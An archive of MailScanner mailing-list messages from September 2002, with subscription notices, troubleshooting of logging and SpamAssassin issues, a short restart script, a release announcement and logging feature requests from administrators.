some has a beta available! Jonothon Ortiz wrote: > Hey; Just curious if ayone's had success with Qmail & MS =) > > Jonothon Ortiz > Vice President > > Xnext, Inc. > Macromedia Alliance Partners > > http://www.Xnext.com > mailto:Jon@Xnext.com > > -- Regards Brandon Friedman Cell:083 408 7840 E-mail: brandonf@bfconsult.co.za www.bfconsult.co.za From LISTSERV at JISCMAIL.AC.UK Sat Sep 7 14:55:20 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:30 2006 Subject: MAILSCANNER: mdlaney@MOREHOUSE.EDU left the list Message-ID: <200209071355.OAA22736@magpie.ecs.soton.ac.uk> Sat, 7 Sep 2002 14:55:20 Matt Laney has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- [WWW request received from 216.27.160.86] From LISTSERV at JISCMAIL.AC.UK Sat Sep 7 15:05:09 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:30 2006 Subject: MAILSCANNER: mdlaney@MOREHOUSE.EDU requested to join Message-ID: <200209071405.PAA23361@magpie.ecs.soton.ac.uk> Sat, 7 Sep 2002 15:05:09 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Matt Laney . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER mdlaney@MOREHOUSE.EDU Matt Laney The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+mdlaney%40MOREHOUSE.EDU+Matt+Laney&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From LISTSERV at JISCMAIL.AC.UK Sat Sep 7 16:04:53 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:30 2006 Subject: MAILSCANNER: fsurget@AUUOOH.COM requested to join Message-ID: <200209071504.QAA26583@magpie.ecs.soton.ac.uk> Sat, 7 Sep 2002 16:04:53 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from "F. Surget" . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER fsurget@AUUOOH.COM F. Surget The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+fsurget%40AUUOOH.COM+F.+Surget&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From mailscanner at ecs.soton.ac.uk Sat Sep 7 16:38:33 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:30 2006 Subject: Signature for outgoing messages In-Reply-To: <003801c25671$1ccd3960$6501a8c0@mikedesk> References: <5.1.0.14.2.20020907141348.024363e0@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020907163618.039fde98@imap.ecs.soton.ac.uk> At 14:18 07/09/2002, you wrote: >You rock too hard for your own good! :) I must admit, I'm starting to look forward to having a day/evening off! The new version (almost completely re-written), currently stands at 6,900 lines and I'm not finished yet... >-----Original Message----- >From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On >Behalf Of Julian Field >Sent: Saturday, September 07, 2002 8:15 AM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: Re: Signature for outgoing messages > > >At 14:07 07/09/2002, you wrote: > >To expand on that, would it be possible to have the signing by sending > >domain? > >Yes, definitely. You will be able to choose the signature in a whole >variety of different ways. > > >-----Original Message----- > >From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On > >Behalf Of Julian Field > >Sent: Saturday, September 07, 2002 3:50 AM > >To: MAILSCANNER@JISCMAIL.AC.UK > >Subject: Re: Signature for outgoing messages > > > > > >At 07:52 07/09/2002, you wrote: > > >The sign all messages signs all messages local or external. Is it > > >possible for me to enable sign only for messages going to external > > >domains? > > > >This is another feature that will be in the next major release. It's > >coming on very well at the moment, but is still a few weeks away from > >release. > >-- > >Julian Field Teaching Systems Manager > >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > >Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From LISTSERV at JISCMAIL.AC.UK Sat Sep 7 17:54:20 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:30 2006 Subject: MAILSCANNER: dw@LKER.CO.UK requested to join Message-ID: <200209071654.RAA02405@magpie.ecs.soton.ac.uk> Sat, 7 Sep 2002 17:54:20 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Darren Walker . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER dw@LKER.CO.UK Darren Walker The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+dw%40LKER.CO.UK+Darren+Walker&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From LISTSERV at JISCMAIL.AC.UK Sat Sep 7 18:28:02 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:31 2006 Subject: MAILSCANNER: snf@APDO.COM requested to join Message-ID: <200209071728.SAA04053@magpie.ecs.soton.ac.uk> Sat, 7 Sep 2002 18:28:02 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Sergio Navarro . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER snf@APDO.COM Sergio Navarro The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+snf%40APDO.COM+Sergio+Navarro&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From LISTSERV at JISCMAIL.AC.UK Sun Sep 8 16:45:17 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:31 2006 Subject: MAILSCANNER: vernon@B2UNOW.COM requested to join Message-ID: <200209081545.QAA04475@magpie.ecs.soton.ac.uk> Sun, 8 Sep 2002 16:45:17 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Vernon Webb . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER vernon@B2UNOW.COM Vernon Webb The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+vernon%40B2UNOW.COM+Vernon+Webb&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From LISTSERV at JISCMAIL.AC.UK Sun Sep 8 19:33:35 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:31 2006 Subject: MAILSCANNER: henrik@CHELLE.NU requested to join Message-ID: <200209081833.TAA14011@magpie.ecs.soton.ac.uk> Sun, 8 Sep 2002 19:33:35 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Henrik Kjellsson . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER henrik@CHELLE.NU Henrik Kjellsson The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+henrik%40CHELLE.NU+Henrik+Kjellsson&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From mailscanner at ecs.soton.ac.uk Mon Sep 9 10:29:55 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:31 2006 Subject: duplicated log messages In-Reply-To: <014c01c25832$8e95b460$73281ad4@fadhly> Message-ID: <5.1.0.14.2.20020909102925.023a0718@imap.ecs.soton.ac.uk> This is probably a function of your /etc/syslog.conf settings. Please read "man syslog.conf". At 19:56 09/09/2002, you wrote: >Hi all, > >Is it normal to have duplication in the log file. I have something like >this in /var/log/maillog : > >maillog.2:Aug 30 05:19:37 adi mailscanner[25079]: Found 1 viruses in >messages g7 >U2JXSM008226 >maillog.2:Aug 30 05:19:42 adi mailscanner[25079]: Found 1 viruses in >messages g7 >U2JXSM008226 > >If it's not normal, does this affect mrtg accuracy. > >Thank you > >Abdullah Alfadhly >System Administrator >KACST -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From Denis.Beauchemin at USHERBROOKE.CA Mon Sep 9 14:30:35 2002 From: Denis.Beauchemin at USHERBROOKE.CA (Denis Beauchemin) Date: Thu Jan 12 21:15:31 2006 Subject: MailScanner stops logging In-Reply-To: <5.1.0.14.2.20020906214659.0303a2b0@imap.ecs.soton.ac.uk> References: <1031324840.32171.22.camel@dbeauchemin.si.usherb.ca> <1031324840.32171.22.camel@dbeauchemin.si.usherb.ca> <5.1.0.14.2.20020906214659.0303a2b0@imap.ecs.soton.ac.uk> Message-ID: <1031578235.1312.12.camel@dbeauchemin.si.usherb.ca> Hi Julian, There was just a small error: /usr/local/MailScanner/check_mailscanner is really /usr/local/MailScanner/bin/check_mailscanner. I have tested it and it does the job. I have also modified the Restart Every = 14400 # 4 hours in mailscaner.conf to Restart Every = 144000 # 40 hours so MailScanner doesn't try to restart itself since cron is now doing the job. Thanks again. Denis On Fri, 2002-09-06 at 16:50, Julian Field wrote: > Has anyone got any ideas on this? I can't reproduce it on my systems and so > it's got be beat at the moment > :-( > > Your suggestion of a "service mailscanner restart" should work, but is > slight overkill. If you use the pid file > (/usr/local/MailScanner/var/virus.pid by default if I remember rightly, but > it's in the mailscanner.conf file) and kill that process number, then call > "check_mailscanner" to restart it, that will do all that's necessary. You > can occasionally hit problems starting sendmail if you do it immediately > after killing it (hence the "sleep" in the init.d script). > > #!/bin/sh > pid=`cat /usr/local/MailScanner/var/virus.pid` > kill $pid > sleep 5 > /usr/local/MailScanner/check_mailscanner >/dev/null 2>&1 > > should do the job nicely, but check I got the paths right! > > At 20:56 06/09/2002, you wrote: > >I just checked and my MailScanner stopped logging again, after it > >recycled itself. > > > >Executing "service mailscanner restart" restarts logging. > > > >Should I stop the automatic MailScanner recycling or recycle it in the > >cron using the "service mailscanner restart" command? > > > >Denis > >On Fri, 2002-09-06 at 11:07, Denis Beauchemin wrote: > > > Hello, > > > > > > I am an happy MailScanner user... but I have a problem with MailScanner > > > (3.22-8) that stops logging to syslog. Restarting MailScanner (service > > > mailscanner restart) makes it log again. > > > > > > I believe this occurs after an automatic restart (after 4 hours) as my > > > log shows: > > > Sep 5 15:12:07 smtp3 mailscanner[9375]: Scanning 1 messages, 5005 bytes > > > Sep 5 15:12:07 smtp3 mailscanner[9375]: Scanned 1 messages, 5005 bytes > > in 0 seconds > > > Sep 5 15:15:08 smtp3 mailscanner[9375]: MailScanner E-Mail Virus > > Scanner version 3.22 starting. > > > Sep 5 15:15:08 smtp3 mailscanner[9375]: Configuring mailscanner for > > sendmail... > > > Sep 5 15:15:08 smtp3 mailscanner[9375]: Using locktype = flock > > > Sep 5 19:15:09 smtp3 mailscanner[26370]: MailScanner E-Mail Virus > > Scanner version 3.22 starting. > > > Sep 5 19:15:09 smtp3 mailscanner[26370]: Configuring mailscanner for > > sendmail... > > > > > > This is not (yet) a heavily used server (around 10 messages/hour) but > > > there were no log entries until I restarted MailScanner this morning. I > > > know it was working because it blocked a Yaha infected email and tagged > > > some SPAM. But nothing in the logs... > > > > > > I am on Red Hat 7.3 with Perl v5.6.1. > > > > > > Any ideas of what might be happening? > > > > > > Thanks! > > > > > > Denis > > > -- > > > Denis Beauchemin, analyste > > > Universit? de Sherbrooke, S.T.I. > > > T: 819.821.8000x2252 F: 819.821.8045 > > > > >-- > >Denis Beauchemin, analyste > >Universit? de Sherbrooke, S.T.I. > >T: 819.821.8000x2252 F: 819.821.8045 > > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > -- Denis Beauchemin, analyste Universit? de Sherbrooke, S.T.I. T: 819.821.8000x2252 F: 819.821.8045 From LISTSERV at JISCMAIL.AC.UK Mon Sep 9 15:17:43 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:32 2006 Subject: MAILSCANNER: info@PRO-INVEST.CA requested to join Message-ID: <200209091417.PAA09519@magpie.ecs.soton.ac.uk> Mon, 9 Sep 2002 15:17:43 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Subscribe Mailscanner Mark Tavares . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER info@PRO-INVEST.CA Subscribe Mailscanner Mark Tavares The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+info%40PRO-INVEST.CA+Subscribe+Mailscanner+Mark+Tavares&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From mike at CAMAROSS.NET Mon Sep 9 00:44:55 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:32 2006 Subject: Log level setting in Sendmail to use sendmail.log.pl and get results In-Reply-To: <004001c26d85$43f801c0$69c8a8c0@tpc.ac.uk> Message-ID: What version of MailScanner are you running? It seems like the older versions required syslogd to be run with a -r parameter. -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Brian Chivers Sent: Sunday, October 06, 2002 5:11 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Log level setting in Sendmail to use sendmail.log.pl and get results As you may have seen I have asked for help getting the sendmail.log.pl script working. I think I can seem to workout is how the script detects the virus's in the log file. >From my limited knowledge of perl it look like the script looks for `/mailscanner/` but I have looked through the file manually and I can't find this. What I'd like to know is what should the log level be set to in the sendmail option's ? currently ours is set to 9 and as I didn't set this up I'm not sure what all the options are. Can anyone help, what level does everyone else have it set to ? Brian Chivers -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. From mike at CAMAROSS.NET Mon Sep 9 17:28:21 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:32 2006 Subject: Still catching "Possible Microsoft security vulnerability attack" In-Reply-To: <0f9b01c26e1d$d72f8d80$b3017b81@ictalurus> Message-ID: Allow IFrame Tags = No -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of John Hanks Sent: Monday, October 07, 2002 11:23 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Still catching "Possible Microsoft security vulnerability attack" I must still be doing something wrong, I now have in my mailscanner.conf file the following lines: Allow IFrame Tags Allow Codebase Tags but I am still catching messages with this report. Am I missing something obvious again? Most of the messages quarantined have had iframe tags. There was one that I couldn't locate either an iframe tag or object codebase tag in, but it had some encoded areas that may have contained them and I didn't dig that deep yet. Thanks, jbh From fadhly at KACST.EDU.SA Mon Sep 9 19:56:07 2002 From: fadhly at KACST.EDU.SA (Abdullah Alfadhly) Date: Thu Jan 12 21:15:32 2006 Subject: duplicated log messages Message-ID: <014c01c25832$8e95b460$73281ad4@fadhly> Hi all, Is it normal to have duplication in the log file. I have something like this in /var/log/maillog : maillog.2:Aug 30 05:19:37 adi mailscanner[25079]: Found 1 viruses in messages g7 U2JXSM008226 maillog.2:Aug 30 05:19:42 adi mailscanner[25079]: Found 1 viruses in messages g7 U2JXSM008226 If it's not normal, does this affect mrtg accuracy. Thank you Abdullah Alfadhly System Administrator KACST -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020909/71e5d84c/attachment.html From mkettler at EVI-INC.COM Mon Sep 9 19:07:33 2002 From: mkettler at EVI-INC.COM (Matt Kettler) Date: Thu Jan 12 21:15:32 2006 Subject: Skilled spammers In-Reply-To: <200209071035.g87AZHr24725@ori.rl.ac.uk> Message-ID: <5.1.1.6.0.20020907173258.01993538@192.168.50.2> Getting back to your original question about where to submit false negatives to so future SA/MailScanner releases will catch them... MailScanner doesn't really do any "active" development to catch the spam, it's more of a tool that facilitates the use of several other anti-spam tools, so of the two, SA is your best bet. There at one point was a list intended for this kind of reporting but the SA webpage fails to mention it now. Probably because most people submitting to it were forwarding, not redistributing and they may have stopped using it. The list was spamassassin-sightings. Ask on the spamassassin-talk list what the currently desired false negative reporting mechanisms are, someone should be able to point you in the right direction. Also, before reporting it as a miss for SA, be sure you are running the current version (2.41 at the moment). SA score patterns age as trends in spam and nonspam change, so a false neg for an older version of SA may not be one for newer versions. Of course, if you want to go to extremes, you can start building your own test set, writing rules, and submitting them to the SA bugzilla. The other way is to report the emails to Razor, and other similar spam-hash systems, that way those spams will be caught by anyone using razor, and anyone using razor with SpamAssassin. Admittedly razor is down a lot, but it is a good system in general. At 11:35 AM 9/7/2002 +0100, Bruno Melloni wrote: >I use the default RBLs (free) that come with MailScanner and >SpamAssassin. I am an individual >and cannot afford to pay for RBL access. Anyway, I have managed to stop >them through creative >blacklisting, my question was about improving the two base tools - they >are quite good as they are >(stop 95% of my spam) and would be nice to make them even better so that >people won't need to >relay on yet more components. > >Bruno From mailscanner at ecs.soton.ac.uk Mon Sep 9 21:09:51 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:32 2006 Subject: New release logging suggestions Message-ID: <5.1.0.14.2.20020909210829.02318e10@imap.ecs.soton.ac.uk> The new release is getting there... What logging would people like to see? Anything particular that you want logged? Suggestions please. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From ucs_rat at shsu.edu Mon Sep 9 21:18:29 2002 From: ucs_rat at shsu.edu (ucs_rat) Date: Thu Jan 12 21:15:32 2006 Subject: New release logging suggestions In-Reply-To: <5.1.0.14.2.20020909210829.02318e10@imap.ecs.soton.ac.uk> Message-ID: <004f01c2583e$1007d2c0$1c0b879e@SHSU.EDU> It would be nice if it had logging in the form of >From <$1> To <$2> virus <$3> Where $1 is basically the from field in the e-mail, $2 is the to field, and $3 is what is reported by the virus scanner. I know this won't be accurate for things like klez, but it does let me gauge the growth of other viruses to some degree. This would allow easy tracking how much viruses are from local/remote and what type of viruses are top one's etc... I currently do manage this through lots of awk,grep,perl, and some c routines to get data into this form to report back to other agencies on how things are going at our university. Just a wish or my $0.02 worth --rat -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On Behalf Of Julian Field Sent: Monday, September 09, 2002 3:10 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: New release logging suggestions The new release is getting there... What logging would people like to see? Anything particular that you want logged? Suggestions please. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From Matthew_doherty at DATAWATCH.COM Mon Sep 9 21:33:52 2002 From: Matthew_doherty at DATAWATCH.COM (Matt Doherty) Date: Thu Jan 12 21:15:32 2006 Subject: New release logging suggestions Message-ID: I would like to see some differant text in the log per email virus caught.. I grep the maillog to see how many viruses caught so far that week. For instance, I currently tried 'tail -2000 /var/log/maillog | grep >>>Virus' of course the ">" symbols something that messes grep up and wont work. The only string that works best is just use the word Virus ( tail -2000 /var/log/maillog | grep Virus ) Only thing is, it shows the mailscanner restarting every four hours lines as well as the viruses caught. I cant think of anything good but maybe some weird character that is never seen in the maillog such as a & or pipe symbol? Just something that grep could sniff out easily ONLY for caught viruses. Or do you have a better solution? The Email ID to go along with it as well would be nice. for ones that were scanned and ones that were found to be infected. Hope that is a ok suggestion.. Oh well Im still a newbie anyways 8-) Matt Doherty IT Dept Datawatch Corp >>In a world without walls or fences, who needs Windows and Gates?<< -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Monday, September 09, 2002 5:14 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: New release logging suggestions The new release is getting there... What logging would people like to see? Anything particular that you want logged? Suggestions please. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020909/6bf8a948/attachment.html From lbergman at abi.tconline.net Mon Sep 9 21:45:50 2002 From: lbergman at abi.tconline.net (Lewis Bergman) Date: Thu Jan 12 21:15:32 2006 Subject: New release logging suggestions In-Reply-To: <5.1.0.14.2.20020909210829.02318e10@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020909210829.02318e10@imap.ecs.soton.ac.uk> Message-ID: <200209091545.50340.lbergman@abi.tconline.net> On Monday 09 September 2002 03:09 pm, Julian Field wrote: > The new release is getting there... > > What logging would people like to see? > Anything particular that you want logged? > > Suggestions please. I would definately like the virus name reported by the virus engine. From or To is not useful to me but I am sure it might be for someone. I would like a destinction between a message forwarded that was cleaned and one that wasn't scanned. In general, making the logging as machine freindly as possible to facilitate automated statistic gathering. -- Lewis Bergman Texas Communications 4309 Maple St. Abilene, TX 79602-8044 915-695-6962 ext 115 From jonas at ODENSE.KOLLEGIENET.DK Mon Sep 9 22:03:02 2002 From: jonas at ODENSE.KOLLEGIENET.DK (Jonas Bardino) Date: Thu Jan 12 21:15:32 2006 Subject: New release logging suggestions References: Message-ID: <3D7D0C86.9020106@odense.kollegienet.dk> Matt Doherty wrote: > I would like to see some differant text in the log per email virus > caught.. I grep the maillog to see how many viruses caught so far that > week. For instance, I currently tried 'tail -2000 /var/log/maillog | grep >>>Virus' of course the ">" symbols something that messes grep up and wont work. The only string > that works best is just use the word Virus ( tail -2000 /var/log/maillog > | grep Virus ) Only thing is, it shows the mailscanner restarting every > four hours lines as well as the viruses caught. I cant think of anything > good but maybe some weird character that is never seen in the maillog > such as a & or pipe symbol? Just something that grep could sniff out > easily ONLY for caught viruses. Or do you have a better solution? The > Email ID to go along with it as well would be nice. for ones that were > scanned and ones that were found to be infected. > Hope that is a ok suggestion.. > Oh well Im still a newbie anyways 8-) > > > Matt Doherty Hi Matt Are you looking for something like: 'tail -2000 /var/log/maillog | grep ">>>Virus"' ? (if you enclose the expression in doublequotes the ">"'s won't be treated as redirects). Regards, Jonas From craig at WEBFARM.CO.NZ Mon Sep 9 22:22:36 2002 From: craig at WEBFARM.CO.NZ (Craig St George) Date: Thu Jan 12 21:15:32 2006 Subject: domains Not to scan In-Reply-To: <004f01c2583e$1007d2c0$1c0b879e@SHSU.EDU> References: <5.1.0.14.2.20020909210829.02318e10@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020910091841.03762080@192.168.0.88> Hi maybe this is a feature request or a mod to the domains to scan I would like to do it the other way around eg all domains are scanned unless they are excluded However it would be easier to have an exclude this domain option than and include option as with the include option you need to fill in all domains and there are many Regards From matthew.richard at COCC.COM Mon Sep 9 22:41:33 2002 From: matthew.richard at COCC.COM (Richard, Matt) Date: Thu Jan 12 21:15:32 2006 Subject: New release logging suggestions Message-ID: Julian, It would be nice to have a log entries that could be used to create email usage reports. For each email to have To, From, Subject, Date, bytes, and names of any attachments would allow for easier creation of user reports. I know that he mailarchive feature is similar but I find that report creation is difficult and the messages take up large amounts of space on my server. I have been experimenting with this using the $Rheader fields in sendmail.pl but I'm sure you could do a better job. Matthew Richard LAN Specialist matthew.richard@cocc.com 860-678-0444x449 Connecticut Online Computer Center Avon, CT 06001 -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Monday, September 09, 2002 4:10 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: New release logging suggestions The new release is getting there... What logging would people like to see? Anything particular that you want logged? Suggestions please. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From smohan at VSNL.COM Tue Sep 10 04:39:04 2002 From: smohan at VSNL.COM (S Mohan) Date: Thu Jan 12 21:15:32 2006 Subject: Signature for outgoing messages In-Reply-To: <5.1.0.14.2.20020907163618.039fde98@imap.ecs.soton.ac.uk> Message-ID: <003601c2587b$9e34d740$01000001@mohans> An extension like what I saw in another webmail software. Can each domain have a specific configuration file in the etc directory called .mailscanner.conf? Thus we will be able to use different scanners for different domains, switch on or off spam detection etc. This will help optimise load on the machine by only implementing features required for each domain. This will be useful for multi-domain servers only - I guess many of run multi-domain servers. Mohan -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On Behalf Of Julian Field Sent: Saturday, September 07, 2002 9:09 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Signature for outgoing messages At 14:18 07/09/2002, you wrote: >You rock too hard for your own good! :) I must admit, I'm starting to look forward to having a day/evening off! The new version (almost completely re-written), currently stands at 6,900 lines and I'm not finished yet... >-----Original Message----- >From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On >Behalf Of Julian Field >Sent: Saturday, September 07, 2002 8:15 AM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: Re: Signature for outgoing messages > > >At 14:07 07/09/2002, you wrote: > >To expand on that, would it be possible to have the signing by > >sending domain? > >Yes, definitely. You will be able to choose the signature in a whole >variety of different ways. > > >-----Original Message----- > >From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK] On > >Behalf Of Julian Field > >Sent: Saturday, September 07, 2002 3:50 AM > >To: MAILSCANNER@JISCMAIL.AC.UK > >Subject: Re: Signature for outgoing messages > > > > > >At 07:52 07/09/2002, you wrote: > > >The sign all messages signs all messages local or external. Is it > > >possible for me to enable sign only for messages going to external > > >domains? > > > >This is another feature that will be in the next major release. It's > >coming on very well at the moment, but is still a few weeks away from > >release. > >-- > >Julian Field Teaching Systems Manager > >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > >Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From henrik at LEWANDER.COM Tue Sep 10 07:02:33 2002 From: henrik at LEWANDER.COM (Henrik Lewander) Date: Thu Jan 12 21:15:32 2006 Subject: Empty SA reports again Message-ID: <0ccf01c2588f$a94b7ee0$05c6a8c0@gbg.bluelabs.se> Hi all, I still occasionly get the empty spamassassin reports: X-MailScanner-SpamCheck: not spam, SpamAssassin () I run perl 5.8.0, mailscanner 3.22.12 and spamassassin 2.41. Regards, Henrik From mailscanner at ecs.soton.ac.uk Tue Sep 10 09:12:11 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:32 2006 Subject: ANNOUNCE: 3.22-13 released Message-ID: <5.1.0.14.2.20020910090642.04ea1dc0@imap.ecs.soton.ac.uk> I have just released version 3.22-13. There are a few fixes and improvements: Version 3.22-13 =============== -- Fixed problems caused when logging activity involving attachments whose filenames contain '%' characters. -- Improvement to the Command AV parser to handle more output types, as suggested by a user. -- Simplified the wildcard whitelist checking code when looking for spam, to make it more reliable as previous version fails occasionally. -- Fixed Exim setuid/setgid ordering bug. If you fit in any of these categories, then I would advise you to upgrade: -- you get occasional crashes -- you use Command AV -- you use Exim Download as usual from www.mailscanner.info Unless I have made any packaging mistakes, this will almost certainly be the last release of version 3. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 10 09:06:38 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:32 2006 Subject: Empty SA reports again In-Reply-To: <0ccf01c2588f$a94b7ee0$05c6a8c0@gbg.bluelabs.se> Message-ID: <5.1.0.14.2.20020910090602.052861a0@imap.ecs.soton.ac.uk> Is there accompanying maillog output? It's possible that SpamAssassin timed out at just the wrong moment. At 07:02 10/09/2002, you wrote: >Hi all, > >I still occasionly get the empty spamassassin reports: >X-MailScanner-SpamCheck: not spam, SpamAssassin () > >I run perl 5.8.0, mailscanner 3.22.12 and spamassassin 2.41. > >Regards, >Henrik -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 10 09:18:45 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:32 2006 Subject: New release logging suggestions In-Reply-To: Message-ID: 